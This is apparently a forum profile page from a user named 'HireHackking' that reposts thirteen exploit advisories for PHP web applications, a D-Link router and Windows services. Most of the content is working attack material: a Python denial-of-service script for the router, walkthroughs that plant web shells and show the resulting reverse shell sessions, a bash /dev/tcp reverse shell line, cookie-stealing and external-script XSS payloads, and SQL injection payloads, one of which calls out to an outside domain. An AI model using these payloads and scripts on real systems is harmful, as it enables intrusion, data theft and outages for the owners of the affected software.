Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Employee Performance Evaluation System v1.0 - File Inclusion and RCE

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Employee Performance Evaluation System v1.0 - File Inclusion and RCE ## Exploit Author: nu11secur1ty ## Date: 03.17.2023 ## Vendor: https://www.sourcecodester.com/user/257130/activity ## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html ## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/ ## Description: The Employee Performance Evaluation System-1.0 suffer from File Inclusion - RCE Vulnerabilities. The usual user of this system is allowed to submit a malicious file or upload a malicious file to the server. After then this user can execute remotely the already malicious included file on the server of the victim. This can bring the system to disaster or can destroy all information that is inside or this information can be stolen. STATUS: CRITICAL Vulnerability [+]Get Info: ```PHP <?php // by nu11secur1ty - 2023 phpinfo(); ?> ``` [+]Exploit: ```PHP <?php // by nu11secur1ty - 2023 // Old Name Of The file $old_name = "C:/xampp7/htdocs/pwnedhost7/epes/" ; // New Name For The File $new_name = "C:/xampp7/htdocs/pwnedhost7/epes15/" ; // using rename() function to rename the file rename( $old_name, $new_name) ; ?> ``` ## Proof Of Concept: https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  2. HireHackking

    DLink DIR 819 A1 - Denial of Service

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: DLink DIR 819 A1 - Denial of Service # Date: 30th September, 2022 # Exploit Author: @whokilleddb (https://twitter.com/whokilleddb) # Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router # Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1) # Tested on: Firmware Version - 1.06 Hardware Version - A1 # CVE : CVE-2022-40946 # # Github: https://github.com/whokilleddb/dlink-dir-819-dos # # $ ./exploit.py -i 192.168.0.1 # [+] DLink DIR-819 DoS exploit # [i] Address to attack: 192.168.0.1 # [i] Using SSL: False # [i] Request Timeout: 30s # [i] Buffer Length: 19 # [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522 # [+] Exploit Successful! #!/usr/bin/env python3 import sys import string import urllib3 import requests import argparse import random import socket from rich import print # Disable SSL Warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Globals TIMEOUT = 30 #BUFFER_LEN = 19 BUFFER_LEN = 32 # Class to exploit class Exploit: def __init__(self, ip, is_ssl): """Initialize the constructor""" self.ip = ip self.is_ssl = is_ssl _payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}" if self.is_ssl: self.payload = f"https://{_payload}" else: self.payload = f"http://{_payload}" def show(self): """Show the parameters""" print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]") print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]") print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]") print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]") print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]") def run(self): """Run the exploit""" print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]") self.show() try: r = requests.get(self.payload, verify=False, timeout=TIMEOUT) if "Internal Error" in r.text: print(f"[bold][[green]+[/green]] Exploit Successful![/bold]") print(f"[bold][[green]+[/green]] Router services must be down![/bold]") else: print(f"[bold][[red]![/red]] Exploit Failed :([/bold]") except requests.exceptions.Timeout: print(f"[bold][[green]+[/green]] Exploit Successful![/bold]") except Exception as e: print(f"Error occured as: {e}") def main(): """Main function to run""" parser = argparse.ArgumentParser( description="DLink DIR-819 Unauthenticated DoS") parser.add_argument('-i', '--ip', required=True, help="IP of the router") parser.add_argument('-s', '--ssl', required=False, action="store_true") opts = parser.parse_args() try: ip = socket.gethostbyname(opts.ip) except socket.error: print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr) return is_ssl = opts.ssl exploit = Exploit(ip, is_ssl) exploit.run() if __name__ == '__main__': main()
  3. HireHackking

    Abantecart v1.3.2 - Authenticated Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Abantecart v1.3.2 - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 3rd Mar'2022 # CVE ID: CVE-2022-26521 # Confirmed on release 1.3.2 # Vendor: https://www.abantecart.com/download ############################################### #Step1- Login with Admin Credentials #Step2- Uploading .php files is disabled by default hence we need to abuse the functionality: Goto Catalog=>Media Manager=>Images=>Edit=> Add php in Allowed file extensions #Step3- Now Goto Add Media=>Add Resource=> Upload php web shell #Step4- Copy the Resource URL location and execute it in the browser e.g. : Visit //IP_ADDR/resources/image/18/7a/4.php (Remove the //) and get the reverse shell: listening on [any] 4477 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 34532 Linux debian 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux 11:17:51 up 2:15, 1 user, load average: 1.91, 1.93, 1.52 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT bitnami tty1 - 09:05 1:05m 0.20s 0.01s -bash uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off $ whoami daemon $ id uid=1(daemon) gid=1(daemon) groups=1(daemon) $
  4. HireHackking

    Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) # Date: 2022-07-02 # Exploit Author: Ali Alipour # Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Windows 10 Pro x64 - XAMPP Server # CVE : CVE-2022-35155 #Issue Detail: The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. # Vulnerable page: /buspassms/download-pass.php # Vulnerable Parameter: searchdata [ POST Data ] #Request : POST /buspassms/download-pass.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3 Origin: https://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: https://127.0.0.1/buspassms/download-pass.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 25 searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search= #Response : HTTP/1.1 200 OK Date: Fri, 01 Jul 2022 00:14:25 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8 X-Powered-By: PHP/7.4.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6425 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html lang="en"> <head> <title>Bus Pass Management System || Pass Page</title> <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba ...[SNIP]... <h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4> ...[SNIP]...
  5. HireHackking

    SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 7th March 2022 # CVE ID: CVE-2022-26982 # Confirmed on release 2.1.1 # Vendor: https://download.simplemachines.org/ # Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor! ############################################### #Step1- Login with Admin Credentials #Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php #Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?> #Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page #Step5- Now click on "Themes and Layout" and you will get the reverse shell: E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell: listening on [any] 4477 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276 bash: cannot set terminal process group (1334): Inappropriate ioctl for device bash: no job control in this shell daemon@debian:/opt/bitnami/simplemachinesforum$ whoami whoami daemon daemon@debian:/opt/bitnami/simplemachinesforum$ id id uid=1(daemon) gid=1(daemon) groups=1(daemon) daemon@debian:/opt/bitnami/simplemachinesforum$
  6. HireHackking

    ImpressCMS v1.4.3 - Authenticated SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3 # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 7th March 2022 # CVE ID: CVE-2022-26986 # Confirmed on release 1.4.3, this vulnerability is patched in the version 1.4.4 and above... # Vendor: https://www.impresscms.org # Source: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3 ############################################### #Step1- Login with Admin Credentials #Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request): POST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1 Host: 192.168.56.117 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701 Content-Length: 1011 Origin: http://192.168.56.117 Connection: close Referer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 Cookie: tbl_SystemMimetype_sortsel=mimetypeid; tbl_limitsel=15; tbl_SystemMimetype_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3 Upgrade-Insecure-Requests: 1 -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="mimetypeid" 1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="extension" bin -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="types" application/octet-stream -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="name" Binary File/Linux Executable -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="icms_page_before_form" http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="op" addmimetype -----------------------------40629177308912268471540748701 Content-Disposition: form-data; name="modify_button" Submit -----------------------------40629177308912268471540748701-- Vulnerable Payload: 1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) //time-based blind (query SLEEP) Output: web application technology: Apache 2.4.52, PHP 7.4.27 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) available databases [6]: [*] impresscms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test
  7. HireHackking

    Password Manager for IIS v2.0 - XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Password Manager for IIS v2.0 - XSS # Exploit Author: VP4TR10T # Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/ # Software Link: http://passwordmanager.adiscon.com/ <http://passwordmanager.adiscon.com/> # Version: *Version 2.0 # Tested on: WINDOWS # CVE : CVE-2022-36664 Affected URI (when changing user password): POST /isapi/PasswordManager.dll HTTP/1.1 Affected Parameter in http payload:*ReturnURL*=<script>alert(document.cookie)</script> *Cordially,*
  8. HireHackking

    MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 26th Feb'2022 # CVE ID: CVE-2022-26149 # Confirmed on release 2.8.3-pl # Reference: https://github.com/sartlabs/0days/blob/main/Modx/Exploit.txt # Vendor: https://modx.com/download ############################################### #Step1- Login with Admin Credentials #Step2- Uploading .php files is disabled by default hence we need to abuse the functionality: Add the php file extension under the "Uploadable File Types" option available in "System Settings" #Step3- Now Goto Media=>Media Browser and upload the Shell.php #Step4- Now visit http://IP_Address/Shell.php and get the reverse shell: listening on [any] 4477 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 58056 bash: cannot set terminal process group (1445): Inappropriate ioctl for device bash: no job control in this shell daemon@debian:/opt/bitnami/modx$
  9. HireHackking

    Canteen-Management v1.0 - XSS-Reflected

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Canteen-Management v1.0 - XSS-Reflected ## Exploit Author: nu11secur1ty ## Date: 10.04.2022 ## Vendor: Free PHP Projects & Ideas with Source Codes for Students | mayurik <https://www.mayurik.com/> ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management ## Description: The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can craft a very malicious HTTPS URL redirecting to a very malicious URL. When the victim clicks into this crafted URL the game will over for him. [+]Payload REQUEST: ```HTML GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22 https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` [+]Payload RESPONSE: ```burp HTTP/1.1 200 OK Date: Tue, 04 Oct 2022 09:44:55 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 X-Powered-By: PHP/8.1.6 Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6140 Connection: close Content-Type: text/html; charset=UTF-8 <link rel="stylesheet" href="assets/css/popup_style.css"> <style> .footer1 { position: fixed; bottom: 0; width: 100%; color: #5c4ac7; text-align: center; } </style> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="author" content=""> <link rel="icon" type="image/png" sizes="16x16" href="assets/uploadImage/Logo/favicon.png"> <style type="text/css"> @media print { #printbtn { display : none; } } </style> <title>Youthappam Canteen Management System - by Mayuri K. Freelancer</title> <link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet"> <link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" /> <link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet" /> <link href="assets/css/lib/bootstrap/bootstrap.min.css" rel="stylesheet"> <link href="assets/css/helper.css" rel="stylesheet"> <link href="assets/css/style.css" rel="stylesheet"> <link rel="stylesheet" href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" /> <link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet"> <link href="assets/css/lib/calendar2/pignose.calendar.min.css" rel="stylesheet"> <link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet"> <link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css" rel="stylesheet"> <script type="text/javascript" src=" https://www.gstatic.com/charts/loader.js"></script> <script type="text/javascript"> google.charts.load("current", {packages:["corechart"]}); google.charts.setOnLoadCallback(drawChart); function drawChart() { var data = google.visualization.arrayToDataTable([ ['Food', 'Average sale per Day'], ['Masala dosa', 11], ['Chicken 65 ', 2], ['Karapu Boondi', 2], ['Bellam Gavvalu', 2], ['Gummadikaya Vadiyalu', 7] ]); var options = { title: 'Food Average Sale per Day', pieHole: 0.4, }; var chart = new google.visualization.PieChart(document.getElementById('donutchart')); chart.draw(data, options); } </script> </head> <body class="fix-header fix-sidebar"> <div id="page"></div> <div id="loading"></div> <div id="main-wrapper"> <div class="unix-login"> <div class="container-fluid" style="background-image: url('assets/myimages/background.jpg'); background-color: #ffffff;background-size:cover"> <div class="row"> <div class="col-lg-4 ml-auto"> <div class="login-content"> <div class="login-form"> <center><img src="./assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br> <form action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/" target="_blank" rel="noopener nofollow ugc"> <img src="https:/ raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif" method="post" id="loginForm"> <div class="form-group"> <input type="text" name="username" id="username" class="form-control" placeholder="Username" required=""> </div> <div class="form-group"> <input type="password" id="password" name="password" class="form-control" placeholder="Password" required=""> </div> <button type="submit" name="login" class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button> <!-- <div class="forgot-phone text-right f-right"> <a href="#" class="text-right f-w-600"> Forgot Password?</a> </div> --> <div class="forgot-phone text-left f-left"> <a href = "mailto:mayuri.infospace@gmail.com?subject = Project Development Requirement&body = I saw your projects. I want to develop a project" class="text-right f-w-600"> Click here to contact me</a> </div> </form> </div> </div> </div> </div> </div> </div> </div> <script src="./assets/js/lib/jquery/jquery.min.js"></script> <script src="./assets/js/lib/bootstrap/js/popper.min.js"></script> <script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script> <script src="./assets/js/jquery.slimscroll.js"></script> <script src="./assets/js/sidebarmenu.js"></script> <script src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script> <script src="./assets/js/custom.min.js"></script> <script> function onReady(callback) { var intervalID = window.setInterval(checkReady, 1000); function checkReady() { if (document.getElementsByTagName('body')[0] !== undefined) { window.clearInterval(intervalID); callback.call(this); } } } function show(id, value) { document.getElementById(id).style.display = value ? 'block' : 'none'; } onReady(function () { show('page', true); show('loading', false); }); </script> </body> </html> ``` ## Reproduce: [href]( https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management ) ## Proof and Exploit: [href](https://streamable.com/emg0zo) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  10. HireHackking

    PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS # Date: 2022-10-02 # Exploit Author: Prasheek Kamble # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/ # Version: V 1.2 # Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php # Tested on MAC OS, XAMPP Steps to reproduce: 1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php 2) Fill the form and Enter xss payload "><script src=https://prasheekk05.xss.ht></script> in address field 3) Click on Add Details and intercept the request in Burpsuite 4) After this, the details have been submitted. 5) As soon as admin(Victim) receives our request, when he clicks on it to verify our form, the XSS payload gets fired. 6) Now attacker get's the details of victim like ip address, cookies of Victim, etc 7) So attacker is sucessful in getting the victim's ip address and other details. #POC's https://ibb.co/kSxFp2g https://ibb.co/VvSVRsy https://ibb.co/mSGp4FX https://ibb.co/hXbJ9TZ https://ibb.co/M6vS08S
  11. HireHackking

    Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 12th January,2022 # CVE ID: CVE-2021-46360 # Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS # Reference: https://github.com/sartlabs/0days/blob/main/Composr-CMS/Exploit.py # Vendor: https://compo.sr/download.htm ############################################### #Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr #!/usr/bin/python3 import requests from bs4 import BeautifulSoup import time cookies = { 'has_cookies': '1', 'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic 'commandr_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D', 'last_visit': '1641783779', 'cms_session__b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic } headers = { 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': '*/*', 'Origin': 'http://192.168.56.116', 'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr', 'Accept-Language': 'en-US,en;q=0.9', } params = ( ('keep_session', 'ef14cc258d93a'), #You need to change this as it is dynamic ) data = { '_data': 'command=rm .htaccess', # This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell) 'csrf_token': 'ef14cc258d93a' #You need to change this as it is dynamic } r = requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep_session=ef14cc258d93a', headers=headers, params=params, cookies=cookies, data=data, verify=False) soup = BeautifulSoup(r.text, 'html.parser') #datap=response.read() print (soup) #Step2- Now visit the Content=>File/Media Library and then upload any .php web shell ( #Step 3 Now visit http://IP_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell: ┌─[ci@parrot]─[~] └──╼ $nc -lvvnp 4444 listening on [any] 4444 ... connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 58984 Linux CVE-Hunting-Linux 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux 13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off $ whoami daemon $ id uid=1(daemon) gid=1(daemon) groups=1(daemon) $ pwd / $
  12. HireHackking

    Canteen-Management v1.0 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Canteen-Management v1.0 - SQL Injection ## Exploit Author: nu11secur1ty ## Date: 10.04.2022 ## Vendor: https://www.mayurik.com/ ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi ## Description: The username parameter from Canteen-Management1.0-2022 appears to be vulnerable to SQL injection attacks. The malicious user can attack remotely this system by using this vulnerability to steal all information from the database of this system. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND 'awEr'='awEr&password=h5F!l8j!Y6&login= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi) ## Proof and Exploit: [href](https://streamable.com/vvz2lh) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  13. HireHackking

    Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path # Exploit by: Luis Martinez # Discovery Date: 2022-10-05 # Vendor Homepage: https://www.gestionaleopen.org/ # Software Link : https://www.gestionaleopen.org/download/ # Tested Version: 12.00.00 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DB_GO_80" | findstr /i /v """ DB_GO_80 DB_GO_80 C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80 Auto # Service info: C:\>sc qc "DB_GO_80" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: DB_GO_80 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80 LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DB_GO_80 DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  14. HireHackking

    Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
